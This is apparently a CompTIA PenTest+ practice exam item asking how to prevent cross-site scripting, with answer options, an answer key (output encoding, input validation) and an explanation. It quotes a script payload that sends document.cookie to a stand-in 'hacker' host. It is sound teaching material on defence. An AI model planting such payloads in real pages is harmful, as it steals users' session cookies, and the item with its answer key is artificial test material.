CompTIA PenTest+ (PT1-002) — Question 5

Given the following code:
<SCRIPT>var+img=new+Image();img.src=`http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

Answer options

• A. Web-application firewall
• B. Parameterized queries
• C. Output encoding
• D. Session tokens
• E. Input validation
• F. Base64 encoding

Correct answer: C, E

Explanation

Output encoding is crucial as it ensures that any data rendered in the browser is treated as data rather than executable code, preventing attacks like XSS. Input validation is equally important as it restricts harmful data from being processed by the application, thus mitigating risks associated with malicious input.